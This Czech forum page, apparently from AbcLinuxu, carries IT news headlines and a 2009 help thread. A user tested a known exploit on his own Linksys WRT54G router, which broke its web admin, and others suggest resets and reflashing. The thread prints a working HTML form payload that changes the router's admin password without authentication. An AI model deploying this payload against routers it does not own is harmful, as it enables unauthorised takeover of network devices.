Inzerujte na AbcPráce.cz od 950 Kč

napište » Zprávičky

Ze státního systému unikly osobní údaje zaměstnanců firem

dnes 11:22 | Bezpečnostní upozornění

Úřad pro ochranu osobních údajů řeší desítky stížností na jednotné měsíční hlášení zaměstnavatele, které stát spustil počátkem dubna. Systém, jenž má firmám odlehčit od desítek formulářů, nejenže výrazně zatížil jejich účetní oddělení, ale docházelo v něm i k únikům osobních dat zaměstnanců k firmám, kde nepracovali. Podle ministerstva práce a sociálních věcí stála za problémem technická chyba. „Incident se týkal několika stovek

… více »

Ladislav Hagara | Komentářů: 3

Angular 22.0.0

dnes 10:46 | Nová verze

Byla vydána (𝕏, Bluesky) nová verze 22.0.0 open source webového aplikačního frameworku Angular (Wikipedie). Přehled novinek v příspěvku na blogu.

Ladislav Hagara | Komentářů: 0

Vim Classic 8.3

dnes 04:33 | Nová verze

Vim Classic byl vydán ve verzi 8.3. Drew DeVault oznámil tento fork editoru Vim (verze 8.2.0148, tj. těsně před zavedením Vim9 skriptování) v březnu letošního roku. Důvodem forku bylo, že vývojáři editorů Vim a Neovim začali při vývoji využívat LLM.

Ladislav Hagara | Komentářů: 5

DevConf.CZ 2026 / Program a registrace

dnes 03:44 | Komunita

Open source konference DevConf.CZ 2026 proběhne 18. a 19. června v Brně na FIT VUT. Publikován byl program a spuštěna byla registrace.

Ladislav Hagara | Komentářů: 0

Velký jazykový model Mellum2

včera 19:44 | Nová verze

Společnost JetBrains uvolnila verzi 2 svého open-source velkého jazykového modelu (LLM) pro vývojáře Mellum.

Ladislav Hagara | Komentářů: 0

Microsoft Build 2026

včera 14:44 | IT novinky

Probíhá konference Microsoft Build 2026. Microsoft představuje své novinky: kvantový čip Majorana 2, Surface Laptop Ultra a Surface RTX Spark Dev Box s NVIDIA RTX Spark, Intelligent Terminal, Coreutils for Windows (fork Rust Coreutils), AI modely MAI, AI agenta Scout, platformu pro agent-first zařízení Project Solara, …

Ladislav Hagara | Komentářů: 0

Google Chrome 149

včera 12:44 | Nová verze

Google Chrome 149 byl prohlášen za stabilní. Nejnovější stabilní verze 149.0.7827.53 přináší řadu novinek. Podrobný přehled v poznámkách k vydání. Vylepšeny byly také nástroje pro vývojáře.

Ladislav Hagara | Komentářů: 0

Pluto.jl 1.0

včera 10:55 | Nová verze

Pluto.jl, reaktivní notebook pro programovací jazyk Julia, dospěl do verze 1.0.

Ladislav Hagara | Komentářů: 4

Snap! 12.0.0

2.6. 13:44 | Nová verze

Byla vydána nová verze 12.0.0 vizuálního programovacího jazyka Snap! (Wikipedie) inspirovaného jazykem Scratch (Wikipedie). Přehled novinek na GitHubu.

Ladislav Hagara | Komentářů: 0

Hra Gravity Circuit na Steamu zdarma

2.6. 11:44 | IT novinky

Počítačovou hru Gravity Circuit (ProtonDB) lze do 14. června do 19:00 získat na Steamu zdarma. Napořád.

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 30, poslední 3.4. 20:20

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Hardwarová poradna / Router Linksys WRT54G - hacked - nejde http na routeru

Štítky: HTML, Internet, konfigurace, password, router, TELNET, web

Dotaz: Router Linksys WRT54G - hacked - nejde http na routeru

9.5.2009 09:44 Otto Šabart | skóre: 13 | blog: KatiePC blog
Router Linksys WRT54G - hacked - nejde http na routeru

Přečteno: 1229×

Odpovědět | Admin

Ahojte, mam menší problém.

Vlastnim router Linksys wrt54g (version 7). Neveril jsem tomu, že existuje na tento router exploit pomocí kterého si bez problému zmenite cele master password. Musel jsem to vyzkouset. Exploit posle data pres POST na script roterovsky script manage.tri.

Ukazka vypada nejak takto:





<\form method="post" action="http://192.168.2.1/manage.tri">

<\input type="hidden" name="remote_mgt_https" value="0">

<\input type="hidden" name="http_enable" value="1">

<\input type="hidden" name="https_enable" value="0">

<\input type="hidden" name="PasswdModify" value="1">

<\input type="hidden" name="http_passwd" value="hacked">

<\input type="hidden" name="http_passwdConfirm" value="hacked">

<\input type="hidden" name="_http_enable" value="1">

<\input type="hidden" name="web_wl_filter" value="1">

<\input type="hidden" name="remote_management" value="0">

<\input type="hidden" name="upnp_enable" value="1">

<\input type="hidden" name="layout" value="en">

<\input type="submit">

<\/form>

Tento html kod zmeni master pasword na "hacked". Neveril jsem tomu, a hle, ono se to povedlo. Do administrace me to pustilo pod novým heslem. Neveril jsem tomu. Musel jsem vse vyzkouset jeste jednou. Jenze po druhem pokusu na routeru spadla cela sluzba pro HTTP a uz neslo jit vubec do webove administrace. Ani po vypnuti a zapnuti routeru http nenaskoci. Bojim se router vyresetovat uplne, protoze si myslim, ze se akorat vyresetuje konfigurace a http stejne nenaskoci. Router by pak byl uz uplne nepouzitelny. Krome http na routeru funguje zatim vsechno a sit je normalne funkcni - jen proste nejde zmenit jakoukoliv konfiguraci.

Situaci jsem chtel resit pres telnet. Jenze u verze 7 telnet nefunguje.

Nevite nekdo jakym zpusobem http nahodit nebo jestli MasterReset zafunguje a nahodi sluzbu?

Za vsechny napady dekuju.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Řešení dotazu:

Komentář #5 (Otto Šabart, 1 hlasů)

Nástroje: Začni sledovat (1) ?

Odpovědi

9.5.2009 14:18 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Eh, otevřít to a připojit se přes JTAG asi nemůžeš, že? Jinak já bych to vyresetoval a když to nepomůže, tak bych si sehnal nádobíčko pro připojení k sériáku... Google: Linksys WRT54G jtag, nezoufej, vypadá to, že si s ním užili i jiní ;-)

9.5.2009 14:35 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

No, bude to jeste asi dost zajimavy. Pockam na chvili az bude opravdu nutne router vyresetovat a uvidime jestli sluzba naskoci. Resit to pres ten JTAG je celkem neomalene reseni, ale kdyz mi nic jineho nezbyde, tak to zkusim. Treba se neco priucim.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

10.5.2009 19:39 R
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Ahoj, myslím že nejlepší by bylo udělat master reset a nahrát poslední "Firmware Version: v7.00.4"

Vlastním také WRT54G a http normálně do internetu otevřené nemám, ale jednou jsem ho potřeboval konfigurovat vzdáleně a tak jsem to na pár dní otevřel. Když jsem se pak chtěl připojit, tak to na http nedalo ani přihlašovací okno. Restart nepomohl, tak jsem udělal master reset, ten pomohl. Pokusil jsem se nahrát poslední firmware 7.00.4 to ale z neznámého důvodu nedopadlo a WRT byl v háji. Až nakonec po různých kombinacích zapnutí vypnutí a resetů se router rozjel a po připojení na http se objevilo okénko kde jediné co se dalo dělat byl upgrade firmware. Tak jsem ho tam znovu nahrál, tentokrát to dopadlo OK a router chodí.

10.5.2009 21:52 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Ja ("nastesti" - ono jak kdy :-) ), primo do internetu pripojen nejsem. Jsem kryty jeste jednim routerem, takze o bezpecnost obavy tolik nemam. Asi pujdu na ten master reset, uvidime jestli naskoci. Pak sem dam vedet jak to dopadlo. Uz nevim jiste jestli jsem mel zupgradovano na 7.004, ale urcite to kdyztak napravim (jestli bude jeste moznost to napravit :-) ).

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Řešení 1× (Otto Šabart (tazatel))

11.5.2009 18:03 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Takze jsem router vyresetoval, a to nekolikrat. Asi az treti restart pomohl a http naskocilo. Vse jsem znovu nakonfiguraoval a uz vse funguje tak jak ma. Dekuji za odpovedi.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Založit nové vlákno • Nahoru

Tiskni Sdílej: